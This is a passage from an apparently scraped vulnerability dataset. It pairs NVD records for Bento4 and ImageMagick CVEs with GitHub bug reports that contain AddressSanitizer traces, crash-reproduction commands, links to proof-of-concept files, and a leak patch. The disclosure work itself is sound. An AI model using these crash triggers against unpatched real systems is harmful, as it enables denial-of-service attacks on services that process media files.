(/home/parallels/Desktop/Fuzz/Bento4/Bento4-SRC-1-5-1-627/cmakebuild/mp42hls+0x324a89) ``` FoundBy: [email protected]
Allocate for large amounts of memory failed in Ap4StcoAtom.cpp:81 at Bento4 1.5.1-627 when running mp42hls
https://api.github.com/repos/axiomatic-systems/Bento4/issues/350/comments
2
2018-12-31T15:52:26Z
2019-01-12T21:14:48Z
https://github.com/axiomatic-systems/Bento4/issues/350
394,998,583
350
CVE-2019-6132
2019-01-11T05:29:01.763
An issue was discovered in Bento4 v1.5.1-627. There is a memory leak in AP4_DescriptorFactory::CreateDescriptorFromStream in Core/Ap4DescriptorFactory.cpp when called from the AP4_EsdsAtom class in Core/Ap4EsdsAtom.cpp, as demonstrated by mp42aac.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.0" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" } ], "cvssMetricV31": null }
[ { "source": "[email protected]", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/axiomatic-systems/Bento4/issues/357" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:axiosys:bento4:1.5.1-627:*:*:*:*:*:*:*", "matchCriteriaId": "F87642DF-B939-4195-A2AE-F0F1D39CD16D", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/axiomatic-systems/Bento4/issues/357
[ "Exploit", "Third Party Advisory" ]
github.com
[ "axiomatic-systems", "Bento4" ]
there is memory leaks in Ap4String.cpp ./mp42aac poc /dev/null ================================================================= ==15810==ERROR: LeakSanitizer: detected memory leaks Direct leak of 96 byte(s) in 1 object(s) allocated from: #0 0x522860 in operator new(unsigned long) (/root/apps/Bento4/mp42aac+0x522860) #1 0x5c80a5 in AP4_DescriptorFactory::CreateDescriptorFromStream(AP4_ByteStream&, AP4_Descriptor*&) /root/apps/Bento4/Source/C++/Core/Ap4DescriptorFactory.cpp:122:22 #2 0x5f8687 in AP4_EsdsAtom::AP4_EsdsAtom(unsigned int, unsigned char, unsigned int, AP4_ByteStream&) /root/apps/Bento4/Source/C++/Core/Ap4EsdsAtom.cpp:76:9 #3 0x5f8687 in AP4_EsdsAtom::Create(unsigned int, AP4_ByteStream&) /root/apps/Bento4/Source/C++/Core/Ap4EsdsAtom.cpp:52 #4 0x5e14cb in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) /root/apps/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:474:20 #5 0x5ddaa0 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) /root/apps/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:221:14 #6 0x5d6aa5 in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) /root/apps/Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:194:12 #7 0x56699d in AP4_SampleEntry::Read(AP4_ByteStream&, AP4_AtomFactory&) /root/apps/Bento4/Source/C++/Core/Ap4SampleEntry.cpp:115:9 Indirect leak of 32 byte(s) in 1 object(s) allocated from: #0 0x5229e0 in operator new[](unsigned long) (/root/apps/Bento4/mp42aac+0x5229e0) #1 0x557d0a in AP4_String::Assign(char const*, unsigned int) /root/apps/Bento4/Source/C++/Core/Ap4String.cpp:165:15 SUMMARY: AddressSanitizer: 128 byte(s) leaked in 2 allocation(s). [bento4-memory-leak-AP4_String.zip](https://github.com/axiomatic-systems/Bento4/files/2746334/bento4-memory-leak-AP4_String.zip)
memory leaks in Ap4String.cpp
https://api.github.com/repos/axiomatic-systems/Bento4/issues/357/comments
1
2019-01-10T17:00:31Z
2019-01-12T09:36:13Z
https://github.com/axiomatic-systems/Bento4/issues/357
397,925,621
357
CVE-2019-6966
2019-01-25T23:29:00.237
An issue was discovered in Bento4 1.5.1-628. The AP4_ElstAtom class in Core/Ap4ElstAtom.cpp has an attempted excessive memory allocation related to AP4_Array<AP4_ElstEntry>::EnsureCapacity in Core/Ap4Array.h, as demonstrated by mp42hls.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.0" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" } ], "cvssMetricV31": null }
[ { "source": "[email protected]", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/axiomatic-systems/Bento4/issues/361" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:axiosys:bento4:1.5.1-628:*:*:*:*:*:*:*", "matchCriteriaId": "27A2EAA1-1740-4A14-BFFC-BD4406E9BD87", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/axiomatic-systems/Bento4/issues/361
[ "Exploit", "Third Party Advisory" ]
github.com
[ "axiomatic-systems", "Bento4" ]
A crafted input will lead to failed allocate LargeMmapAllocator in Ap4Array.h at Bento4 1.5.1-628. Triggered by ./mp42hls crash3.mp4 Poc [poc1.zip](https://github.com/axiomatic-systems/Bento4/files/2795098/poc1.zip) Bento4 Version 1.5.1-628 The ASAN information is as follows: ``` ==56305==ERROR: AddressSanitizer failed to allocate 0xc00003000 (51539619840) bytes of LargeMmapAllocator (errno: 12) ==56305==Process memory map follows: 0x000000400000-0x0000007b4000 /home/jas/Downloads/Bento4-SRC-1-5-1-628/cmakebuild/mp42hls 0x0000009b4000-0x0000009b5000 /home/jas/Downloads/Bento4-SRC-1-5-1-628/cmakebuild/mp42hls 0x0000009b5000-0x000000b5b000 /home/jas/Downloads/Bento4-SRC-1-5-1-628/cmakebuild/mp42hls 0x00007fff7000-0x00008fff7000 0x00008fff7000-0x02008fff7000 0x02008fff7000-0x10007fff8000 0x600000000000-0x602000000000 0x602000000000-0x602000010000 0x602000010000-0x603000000000 0x603000000000-0x603000010000 0x603000010000-0x604000000000 0x604000000000-0x604000010000 0x604000010000-0x606000000000 0x606000000000-0x606000010000 0x606000010000-0x607000000000 0x607000000000-0x607000010000 0x607000010000-0x608000000000 0x608000000000-0x608000010000 0x608000010000-0x60c000000000 0x60c000000000-0x60c000010000 0x60c000010000-0x60d000000000 0x60d000000000-0x60d000010000 0x60d000010000-0x60e000000000 0x60e000000000-0x60e000010000 0x60e000010000-0x611000000000 0x611000000000-0x611000010000 0x611000010000-0x616000000000 0x616000000000-0x616000020000 0x616000020000-0x619000000000 0x619000000000-0x619000020000 0x619000020000-0x621000000000 0x621000000000-0x621000020000 0x621000020000-0x631000000000 0x631000000000-0x631000030000 0x631000030000-0x640000000000 0x640000000000-0x640000003000 0x7ff016000000-0x7ff016100000 0x7ff016200000-0x7ff016300000 0x7ff01635e000-0x7ff0186b0000 0x7ff0186b0000-0x7ff0187b8000 /lib/x86_64-linux-gnu/libm-2.23.so 0x7ff0187b8000-0x7ff0189b7000 /lib/x86_64-linux-gnu/libm-2.23.so 0x7ff0189b7000-0x7ff0189b8000 /lib/x86_64-linux-gnu/libm-2.23.so 0x7ff0189b8000-0x7ff0189b9000 /lib/x86_64-linux-gnu/libm-2.23.so 0x7ff0189b9000-0x7ff0189bc000 /lib/x86_64-linux-gnu/libdl-2.23.so 0x7ff0189bc000-0x7ff018bbb000 /lib/x86_64-linux-gnu/libdl-2.23.so 0x7ff018bbb000-0x7ff018bbc000 /lib/x86_64-linux-gnu/libdl-2.23.so 0x7ff018bbc000-0x7ff018bbd000 /lib/x86_64-linux-gnu/libdl-2.23.so 0x7ff018bbd000-0x7ff018bd5000 /lib/x86_64-linux-gnu/libpthread-2.23.so 0x7ff018bd5000-0x7ff018dd4000 /lib/x86_64-linux-gnu/libpthread-2.23.so 0x7ff018dd4000-0x7ff018dd5000 /lib/x86_64-linux-gnu/libpthread-2.23.so 0x7ff018dd5000-0x7ff018dd6000 /lib/x86_64-linux-gnu/libpthread-2.23.so 0x7ff018dd6000-0x7ff018dda000 0x7ff018dda000-0x7ff018f9a000 /lib/x86_64-linux-gnu/libc-2.23.so 0x7ff018f9a000-0x7ff01919a000 /lib/x86_64-linux-gnu/libc-2.23.so 0x7ff01919a000-0x7ff01919e000 /lib/x86_64-linux-gnu/libc-2.23.so 0x7ff01919e000-0x7ff0191a0000 /lib/x86_64-linux-gnu/libc-2.23.so 0x7ff0191a0000-0x7ff0191a4000 0x7ff0191a4000-0x7ff0191ba000 /lib/x86_64-linux-gnu/libgcc_s.so.1 0x7ff0191ba000-0x7ff0193b9000 /lib/x86_64-linux-gnu/libgcc_s.so.1 0x7ff0193b9000-0x7ff0193ba000 /lib/x86_64-linux-gnu/libgcc_s.so.1 0x7ff0193ba000-0x7ff01952c000 /usr/lib/x86_64-linux-gnu/libstdc++.so.6.0.21 0x7ff01952c000-0x7ff01972c000 /usr/lib/x86_64-linux-gnu/libstdc++.so.6.0.21 0x7ff01972c000-0x7ff019736000 /usr/lib/x86_64-linux-gnu/libstdc++.so.6.0.21 0x7ff019736000-0x7ff019738000 /usr/lib/x86_64-linux-gnu/libstdc++.so.6.0.21 0x7ff019738000-0x7ff01973c000 0x7ff01973c000-0x7ff019830000 /usr/lib/x86_64-linux-gnu/libasan.so.2.0.0 0x7ff019830000-0x7ff019a30000 /usr/lib/x86_64-linux-gnu/libasan.so.2.0.0 0x7ff019a30000-0x7ff019a33000 /usr/lib/x86_64-linux-gnu/libasan.so.2.0.0 0x7ff019a33000-0x7ff019a34000 /usr/lib/x86_64-linux-gnu/libasan.so.2.0.0 0x7ff019a34000-0x7ff01a6a9000 0x7ff01a6a9000-0x7ff01a6cf000 /lib/x86_64-linux-gnu/ld-2.23.so 0x7ff01a81a000-0x7ff01a8b8000 0x7ff01a8b8000-0x7ff01a8ce000 0x7ff01a8ce000-0x7ff01a8cf000 /lib/x86_64-linux-gnu/ld-2.23.so 0x7ff01a8cf000-0x7ff01a8d0000 /lib/x86_64-linux-gnu/ld-2.23.so 0x7ff01a8d0000-0x7ff01a8d1000 0x7ffc5d59c000-0x7ffc5d5bd000 [stack] 0x7ffc5d5c2000-0x7ffc5d5c4000 [vvar] 0x7ffc5d5c4000-0x7ffc5d5c6000 [vdso] 0xffffffffff600000-0xffffffffff601000 [vsyscall] ==56305==End of process memory map. ==56305==AddressSanitizer CHECK failed: ../../../../src/libsanitizer/sanitizer_common/sanitizer_posix.cc:121 "(("unable to mmap" && 0)) != (0)" (0x0, 0x0) #0 0x7ff0197dc631 (/usr/lib/x86_64-linux-gnu/libasan.so.2+0xa0631) #1 0x7ff0197e15e3 in __sanitizer::CheckFailed(char const*, int, char const*, unsigned long long, unsigned long long) (/usr/lib/x86_64-linux-gnu/libasan.so.2+0xa55e3) #2 0x7ff0197e9611 (/usr/lib/x86_64-linux-gnu/libasan.so.2+0xad611) #3 0x7ff01975ec0c (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x22c0c) #4 0x7ff0197d54fe in operator new(unsigned long) (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x994fe) #5 0x550cef in AP4_Array<AP4_ElstEntry>::EnsureCapacity(unsigned int) /home/jas/Downloads/Bento4-SRC-1-5-1-628/Source/C++/Core/Ap4Array.h:172 #6 0x550017 in AP4_ElstAtom::AP4_ElstAtom(unsigned int, unsigned char, unsigned int, AP4_ByteStream&) /home/jas/Downloads/Bento4-SRC-1-5-1-628/Source/C++/Core/Ap4ElstAtom.cpp:73 #7 0x54fd41 in AP4_ElstAtom::Create(unsigned int, AP4_ByteStream&) /home/jas/Downloads/Bento4-SRC-1-5-1-628/Source/C++/Core/Ap4ElstAtom.cpp:51 #8 0x522fcb in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) /home/jas/Downloads/Bento4-SRC-1-5-1-628/Source/C++/Core/Ap4AtomFactory.cpp:545 #9 0x520e72 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) /home/jas/Downloads/Bento4-SRC-1-5-1-628/Source/C++/Core/Ap4AtomFactory.cpp:221 #10 0x4891c3 in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) /home/jas/Downloads/Bento4-SRC-1-5-1-628/Source/C++/Core/Ap4ContainerAtom.cpp:194 #11 0x488c78 in AP4_ContainerAtom::AP4_ContainerAtom(unsigned int, unsigned long long, bool, AP4_ByteStream&, AP4_AtomFactory&) /home/jas/Downloads/Bento4-SRC-1-5-1-628/Source/C++/Core/Ap4ContainerAtom.cpp:139 #12 0x488805 in AP4_ContainerAtom::Create(unsigned int, unsigned long long, bool, bool, AP4_ByteStream&, AP4_AtomFactory&) /home/jas/Downloads/Bento4-SRC-1-5-1-628/Source/C++/Core/Ap4ContainerAtom.cpp:88 #13 0x523eba in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) /home/jas/Downloads/Bento4-SRC-1-5-1-628/Source/C++/Core/Ap4AtomFactory.cpp:764 #14 0x520e72 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) /home/jas/Downloads/Bento4-SRC-1-5-1-628/Source/C++/Core/Ap4AtomFactory.cpp:221 #15 0x4891c3 in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) /home/jas/Downloads/Bento4-SRC-1-5-1-628/Source/C++/Core/Ap4ContainerAtom.cpp:194 #16 0x488c78 in AP4_ContainerAtom::AP4_ContainerAtom(unsigned int, unsigned long long, bool, AP4_ByteStream&, AP4_AtomFactory&) /home/jas/Downloads/Bento4-SRC-1-5-1-628/Source/C++/Core/Ap4ContainerAtom.cpp:139 #17 0x4a2174 in AP4_TrakAtom::AP4_TrakAtom(unsigned int, AP4_ByteStream&, AP4_AtomFactory&) /home/jas/Downloads/Bento4-SRC-1-5-1-628/Source/C++/Core/Ap4TrakAtom.cpp:165 #18 0x524ab5 in AP4_TrakAtom::Create(unsigned int, AP4_ByteStream&, AP4_AtomFactory&) /home/jas/Downloads/Bento4-SRC-1-5-1-628/Source/C++/Core/Ap4TrakAtom.h:58 #19 0x52231f in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) /home/jas/Downloads/Bento4-SRC-1-5-1-628/Source/C++/Core/Ap4AtomFactory.cpp:379 #20 0x520e72 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) /home/jas/Downloads/Bento4-SRC-1-5-1-628/Source/C++/Core/Ap4AtomFactory.cpp:221 #21 0x4891c3 in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) /home/jas/Downloads/Bento4-SRC-1-5-1-628/Source/C++/Core/Ap4ContainerAtom.cpp:194 #22 0x488c78 in AP4_ContainerAtom::AP4_ContainerAtom(unsigned int, unsigned long long, bool, AP4_ByteStream&, AP4_AtomFactory&) /home/jas/Downloads/Bento4-SRC-1-5-1-628/Source/C++/Core/Ap4ContainerAtom.cpp:139 #23 0x530ca3 in AP4_MoovAtom::AP4_MoovAtom(unsigned int, AP4_ByteStream&, AP4_AtomFactory&) /home/jas/Downloads/Bento4-SRC-1-5-1-628/Source/C++/Core/Ap4MoovAtom.cpp:80 #24 0x524a59 in AP4_MoovAtom::Create(unsigned int, AP4_ByteStream&, AP4_AtomFactory&) /home/jas/Downloads/Bento4-SRC-1-5-1-628/Source/C++/Core/Ap4MoovAtom.h:56 #25 0x522198 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) /home/jas/Downloads/Bento4-SRC-1-5-1-628/Source/C++/Core/Ap4AtomFactory.cpp:359 #26 0x520e72 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) /home/jas/Downloads/Bento4-SRC-1-5-1-628/Source/C++/Core/Ap4AtomFactory.cpp:221 #27 0x5207c7 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, AP4_Atom*&) /home/jas/Downloads/Bento4-SRC-1-5-1-628/Source/C++/Core/Ap4AtomFactory.cpp:151 #28 0x48f2c5 in AP4_File::ParseStream(AP4_ByteStream&, AP4_AtomFactory&, bool) /home/jas/Downloads/Bento4-SRC-1-5-1-628/Source/C++/Core/Ap4File.cpp:104 #29 0x48ef34 in AP4_File::AP4_File(AP4_ByteStream&, bool) /home/jas/Downloads/Bento4-SRC-1-5-1-628/Source/C++/Core/Ap4File.cpp:78 #30 0x45eebd in main /home/jas/Downloads/Bento4-SRC-1-5-1-628/Source/C++/Apps/Mp42Hls/Mp42Hls.cpp:1846 #31 0x7ff018dfa82f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) #32 0x4549e8 in _start (/home/jas/Downloads/Bento4-SRC-1-5-1-628/cmakebuild/mp42hls+0x4549e8) ``` FoundBy: [email protected]
failed to allocate LargeMmapAllocator in Ap4Array.h at Bento4 v1.5.1-628 when running mp42hls
https://api.github.com/repos/axiomatic-systems/Bento4/issues/361/comments
1
2019-01-25T07:49:22Z
2019-12-26T14:50:59Z
https://github.com/axiomatic-systems/Bento4/issues/361
403,042,062
361
CVE-2019-7395
2019-02-05T00:29:00.400
In ImageMagick before 7.0.8-25, a memory leak exists in WritePSDChannel in coders/psd.c.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Broken Link", "Third Party Advisory" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2019-04/msg00034.html" }, { "source": "[email protected]", "tags": [ "Broken Link" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2019-05/msg00006.html" }, { "source": "[email protected]", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "http://www.securityfocus.com/bid/106850" }, { "source": "[email protected]", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/ImageMagick/ImageMagick/commit/8a43abefb38c5e29138e1c9c515b313363541c06" }, { "source": "[email protected]", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/ImageMagick/ImageMagick/issues/1451" }, { "source": "[email protected]", "tags": [ "Third Party Advisory" ], "url": "https://usn.ubuntu.com/4034-1/" }, { "source": "[email protected]", "tags": [ "Third Party Advisory" ], "url": "https://www.debian.org/security/2020/dsa-4712" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:imagemagick:imagemagick:*:*:*:*:*:*:*:*", "matchCriteriaId": "E982CE9C-89F7-4A5D-B036-A9A483493D5B", "versionEndExcluding": "6.9.10-25", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:imagemagick:imagemagick:*:*:*:*:*:*:*:*", "matchCriteriaId": "2F7DF2A1-ADDE-48C4-BD39-CCA15D0D767A", "versionEndExcluding": "7.0.8-25", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "7.0.0-0", "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:opensuse:leap:15.0:*:*:*:*:*:*:*", "matchCriteriaId": "F1E78106-58E6-4D59-990F-75DA575BFAD9", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*", "matchCriteriaId": "07B237A9-69A3-4A9C-9DA0-4E06BD37AE73", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:lts:*:*:*", "matchCriteriaId": "F7016A2A-8365-4F1A-89A2-7A19F2BCAE5B", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:canonical:ubuntu_linux:18.04:*:*:*:lts:*:*:*", "matchCriteriaId": "23A7C53F-B80F-4E6A-AFA9-58EEA84BE11D", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:canonical:ubuntu_linux:18.10:*:*:*:*:*:*:*", "matchCriteriaId": "07C312A0-CD2C-4B9C-B064-6409B25C278F", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:canonical:ubuntu_linux:19.04:*:*:*:*:*:*:*", "matchCriteriaId": "CD783B0C-9246-47D9-A937-6144FE8BFF0F", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/ImageMagick/ImageMagick/issues/1451
[ "Exploit", "Patch", "Third Party Advisory" ]
github.com
[ "ImageMagick", "ImageMagick" ]
### Prerequisites - [x] I have written a descriptive issue title - [x] I have verified that I am using the latest version of ImageMagick - [x] I have searched [open](https://github.com/ImageMagick/ImageMagick/issues) and [closed](https://github.com/ImageMagick/ImageMagick/issues?q=is%3Aissue+is%3Aclosed) issues to ensure it has not already been reported ### Description <!-- A description of the bug or feature --> memory leak in WritePSDChannel in coders/psd.c ### Steps to Reproduce <!-- List of steps, sample code, failing test or link to a project that reproduces the behavior. Make sure you place a stack trace inside a code (```) block to avoid linking unrelated issues --> The critical code snippet is: https://github.com/ImageMagick/ImageMagick/blob/master/coders/psd.c#L2767 ```c #ifdef MAGICKCORE_ZLIB_DELEGATE if (compression == ZipCompression) { compressed_pixels=(unsigned char *) AcquireQuantumMemory(CHUNK, //line 2770 sizeof(*compressed_pixels)); if (compressed_pixels == (unsigned char *) NULL) { quantum_info=DestroyQuantumInfo(quantum_info); return(0); } memset(&stream,0,sizeof(stream)); stream.data_type=Z_BINARY; level=Z_DEFAULT_COMPRESSION; if ((image_info->quality > 0 && image_info->quality < 10)) level=(int) image_info->quality; if (deflateInit(&stream,level) != Z_OK) //line 2782 { quantum_info=DestroyQuantumInfo(quantum_info); return(0); //line 2785 } } ``` **compressed_pixels** is allocated at *line 2770*, however, when the condition at *line 2782* is satisfied and the function returns at line *2785*, **compressed_pixels** (size is 16KB) is not freed and memory leak happens. In addition, the value of **compressed_pixels** is not passed outside to its caller function when returned at *line 2785*. So the condition that this memory leak happens is that *MAGICKCORE_ZLIB_DELEGATE* is defined, compression type is *ZipCompression* and *deflateInit(&stream,level)* is not *Z_OK*. The size of leaked memory is 16KB. Patch suggestion: ```c if (deflateInit(&stream,level) != Z_OK) //line 2782 { quantum_info=DestroyQuantumInfo(quantum_info); + compressed_pixels=(unsigned char *) RelinquishMagickMemory( + compressed_pixels); return(0); } } ``` ### System Configuration <!-- Tell us about the environment where you are experiencing the bug --> - ImageMagick version: ImageMagick-4f0ea40e2a090e245f31d1f05247520d6e7eb4ca - Environment (Operating system, version and so on): Ubuntu 16.04 - Additional information: <!-- Thanks for reporting the issue to ImageMagick! --> Credit to Bingchang Liu at VARAS of IIE
memory leak in WritePSDChannel in coders/psd.c
https://api.github.com/repos/ImageMagick/ImageMagick/issues/1451/comments
2
2019-01-17T03:11:55Z
2019-02-12T01:45:47Z
https://github.com/ImageMagick/ImageMagick/issues/1451
400,092,278
1,451
CVE-2019-7396
2019-02-05T00:29:00.447
In ImageMagick before 7.0.8-25, a memory leak exists in ReadSIXELImage in coders/sixel.c.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Broken Link", "Third Party Advisory" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2019-04/msg00034.html" }, { "source": "[email protected]", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "http://www.securityfocus.com/bid/106849" }, { "source": "[email protected]", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/ImageMagick/ImageMagick/commit/748a03651e5b138bcaf160d15133de2f4b1b89ce" }, { "source": "[email protected]", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/ImageMagick/ImageMagick/issues/1452" }, { "source": "[email protected]", "tags": [ "Third Party Advisory" ], "url": "https://usn.ubuntu.com/4034-1/" }, { "source": "[email protected]", "tags": [ "Third Party Advisory" ], "url": "https://www.debian.org/security/2020/dsa-4712" } ]
